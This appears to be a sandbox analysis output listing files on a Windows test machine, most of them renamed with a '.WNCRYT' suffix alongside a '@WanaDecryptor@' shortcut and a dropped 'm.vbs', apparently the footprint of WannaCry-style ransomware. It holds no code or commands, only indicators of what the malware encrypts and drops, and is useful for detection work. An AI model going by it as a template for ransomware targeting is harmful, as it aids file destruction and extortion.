file: C:\Users\user\AppData\Roaming\Microsoft\Templates\Normal.dotm.WNCRYT
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\cert9.db.WNCRYT
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\key4.db.WNCRYT
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\prefs.js.WNCRYT
file: C:\ProgramData\Boxstarter\BoxStarter.bat.WNCRYT
file: C:\Users\user\AppData\Local\Temp\m.vbs
file: C:\Users\user\AppData\Local\Temp\@WanaDecryptor@.exe.lnk
file: \Device\NamedPipe\srvsvc
file: C:\Users\user\AppData\Local\Temp\USERDUM-8A61A1P-20251208-1350.log
file: C:\ba69bdf0a250e352360c33\1025\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1028\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1029\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1030\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1031\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1032\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1033\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1035\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1036\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1037\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1038\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1040\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1041\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1042\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1043\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1044\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1045\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1046\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1049\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1053\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\1055\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\2052\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\2070\eula.rtf.WNCRYT
file: C:\ba69bdf0a250e352360c33\3082\eula.rtf.WNCRYT
file: C:\PSTranscripts\20251206\PowerShell_transcript.USERDUM-8A61A1P.fPMufFfM.20251206093923.txt.WNCRYT
file: C:\PSTranscripts\20251206\PowerShell_transcript.USERDUM-8A61A1P.S6TbHpZ5.20251206094405.txt.WNCRYT
file: C:\Sysmon\sysmonconfig.txt.WNCRYT
file: C:\Users\All Users\Boxstarter\LICENSE.txt.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\en-US\about_boxstarter_bootstrapper.help.txt.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\en-US\About_Boxstarter_Variable_In_Bootstrapper.help.txt.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\en-US\about_boxstarter_chocolatey.help.txt.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\en-US\About_Boxstarter_Variable_In_Chocolatey.help.txt.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\en-US\about_boxstarter_logging.help.txt.WNCRYT
file: C:\Users\All Users\chocolatey\CREDITS.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\7zip.install\legal\LICENSE.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\autohotkey.install\tools\license.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\autohotkey.install\tools\VERIFICATION.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\LICENSE.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\en-US\about_boxstarter_bootstrapper.help.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\en-US\About_Boxstarter_Variable_In_Bootstrapper.help.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\LICENSE.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\en-US\about_boxstarter_chocolatey.help.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\en-US\About_Boxstarter_Variable_In_Chocolatey.help.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\LICENSE.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\en-US\about_boxstarter_logging.help.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\LICENSE.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\LICENSE.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\Firefox\tools\LanguageChecksums.csv.WNCRYT
file: C:\Users\All Users\chocolatey\lib\openjdk\openjdk-19.0.1_windows-x64_bin.zip.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\powershell-core\tools\ThirdPartyNotices.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\python3\legal\LICENSE.txt.WNCRYT
file: C:\Users\All Users\chocolatey\lib\winrar\tools\downloadInfo.csv.WNCRYT
file: C:\Users\All Users\chocolatey\tools\7zip.license.txt.WNCRYT
file: C:\Users\All Users\chocolatey\tools\shimgen.license.txt.WNCRYT
file: C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg.WNCRYT
file: C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg.WNCRYT
file: C:\Users\Public\Pictures\Sample Pictures\Desert.jpg.WNCRYT
file: C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg.WNCRYT
file: C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg.WNCRYT
file: C:\Users\Public\Pictures\Sample Pictures\Koala.jpg.WNCRYT
file: C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg.WNCRYT
file: C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg.WNCRYT
file: C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.txt.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ThirdPartyNotices.txt.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\main.jpg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg.WNCRYT
file: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows Photo Viewer\Windows Photo Viewer Wallpaper.jpg.WNCRYT
file: C:\BOOTSECT.BAK.WNCRYT
file: C:\ba69bdf0a250e352360c33\header.bmp.WNCRYT
file: C:\ba69bdf0a250e352360c33\SplashScreen.bmp.WNCRYT
file: C:\ba69bdf0a250e352360c33\watermark.bmp.WNCRYT
file: C:\Users\All Users\Boxstarter\BoxstarterShell.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\chocolateyUninstall.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Cleanup-Boxstarter.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Get-BoxstarterTempDir.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Get-PendingReboot.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Init-Settings.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Install-BoxstarterExtension.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Invoke-Boxstarter.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Invoke-Reboot.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Set-SecureAutoLogon.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Start-UpdateServices.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Stop-UpdateServices.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Test-PendingReboot.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Boxstarter.zip.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\BoxstarterConnectionConfig.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Chocolatey.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Enable-BoxstarterClientRemoting.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Enable-BoxstarterCredSSP.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Enable-RemotePsRemoting.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Get-BoxstarterConfig.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Get-PackageRoot.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Init-Settings.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Install-BoxstarterPackage.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Invoke-BoxstarterBuild.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Invoke-BoxstarterFromTask.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\invoke-chocolatey.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Invoke-ChocolateyBoxstarter.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\New-BoxstarterPackage.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\New-PackageFromScript.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Resolve-VMPlugin.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Send-File.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Set-BoxstarterConfig.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Set-BoxstarterShare.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Confirm-Choice.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Create-BoxstarterTask.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Enter-DotNet4.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Format-BoxStarterMessage.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-BoxstarterTaskContextTempDir.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-CurrentUser.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-HttpResource.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-IsMicrosoftUpdateEnabled.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-IsRemote.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Init-Settings.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Invoke-FromTask.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Invoke-RetriableScript.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Log-BoxStarterMessage.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Out-BoxstarterLog.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Remove-BoxstarterError.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Remove-BoxstarterTask.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Start-TimedSection.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Stop-TimedSection.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Test-Admin.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Write-BoxstarterLogo.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Write-BoxstarterMessage.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.HyperV\Enable-BoxstarterVHD.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.HyperV\Enable-BoxstarterVM.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-BingSearch.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-GameBarTips.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-InternetExplorerESC.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-MicrosoftUpdate.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-UAC.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Enable-MicrosoftUpdate.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Enable-RemoteDesktop.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Enable-UAC.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Get-LibraryNames.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Get-UAC.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Install-WindowsUpdate.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Move-LibraryDirectory.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Restart-Explorer.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-BoxstarterPageFile.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-BoxstarterTaskbarOptions.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-CornerNavigationOptions.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-ExplorerOptions.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-StartScreenOptions.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-TaskbarSmall.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-WindowsExplorerOptions.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Update-ExecutionPolicy.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\bin\RefreshEnv.cmd.WNCRYT
file: C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Get-PackageParameters.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Get-UninstallRegistryKey.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Install-ChocolateyDesktopLink.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Write-ChocolateyFailure.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Write-ChocolateySuccess.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Write-FileUpdateLog.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-AppInstallLocation.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-AvailableDriveLetter.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-EffectiveProxy.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-PackageCacheLocation.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-WebContent.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\extensions\chocolatey-core\Register-Application.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\extensions\chocolatey-core\Remove-Process.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\DotNetFrameworkHelpers.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\Install-ChocolateyInstallPackageAndHandleExitCode.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Get-WindowsUpdateErrorDescription.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Install-ChocolateyPackageAndHandleExitCode.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Install-WindowsUpdate.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Test-WindowsUpdate.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\chocolateyScriptRunner.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\ChocolateyTabExpansion.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Format-FileSize.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Get-CheckSumValid.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Get-ChocolateyPath.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Get-ChocolateyUnzip.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Get-ChocolateyWebFile.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Get-EnvironmentVariable.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Get-EnvironmentVariableNames.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Get-FtpFile.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Get-OSArchitectureWidth.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Get-PackageParameters.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Get-ToolsLocation.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Get-UACEnabled.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Get-UninstallRegistryKey.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Get-VirusCheckValid.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Get-WebFile.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Get-WebFileName.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Get-WebHeaders.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Install-BinFile.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyEnvironmentVariable.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyExplorerMenuItem.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyFileAssociation.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyInstallPackage.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyPackage.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyPath.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyPinnedTaskBarItem.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyPowershellCommand.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyShortcut.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyVsixPackage.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyZipPackage.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Install-Vsix.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Set-EnvironmentVariable.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Set-PowerShellExitCode.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Start-ChocolateyProcessAsAdmin.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Test-ProcessAdminRights.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Uninstall-BinFile.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Uninstall-ChocolateyEnvironmentVariable.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Uninstall-ChocolateyPackage.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\UnInstall-ChocolateyZipPackage.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Update-SessionEnvironment.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Write-FunctionCallLogMessage.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter\tools\chocolateyinstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\chocolateyinstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\setup.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Cleanup-Boxstarter.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Get-BoxstarterTempDir.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Get-PendingReboot.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Init-Settings.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Install-BoxstarterExtension.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Invoke-Boxstarter.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Invoke-Reboot.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Set-SecureAutoLogon.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Start-UpdateServices.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Stop-UpdateServices.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Test-PendingReboot.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\BoxstarterShell.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\chocolateyinstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\chocolateyUninstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\setup.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Boxstarter.zip.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\BoxstarterConnectionConfig.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Chocolatey.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Enable-BoxstarterClientRemoting.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Enable-BoxstarterCredSSP.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Enable-RemotePsRemoting.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Get-BoxstarterConfig.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Get-PackageRoot.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Init-Settings.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Install-BoxstarterPackage.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Invoke-BoxstarterBuild.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Invoke-BoxstarterFromTask.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\invoke-chocolatey.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Invoke-ChocolateyBoxstarter.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\New-BoxstarterPackage.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\New-PackageFromScript.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Resolve-VMPlugin.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Send-File.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Set-BoxstarterConfig.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Set-BoxstarterShare.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\chocolateyinstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\setup.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Confirm-Choice.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Create-BoxstarterTask.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Enter-DotNet4.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Format-BoxStarterMessage.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-BoxstarterTaskContextTempDir.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-CurrentUser.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-HttpResource.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-IsMicrosoftUpdateEnabled.ps1.WNCRYT
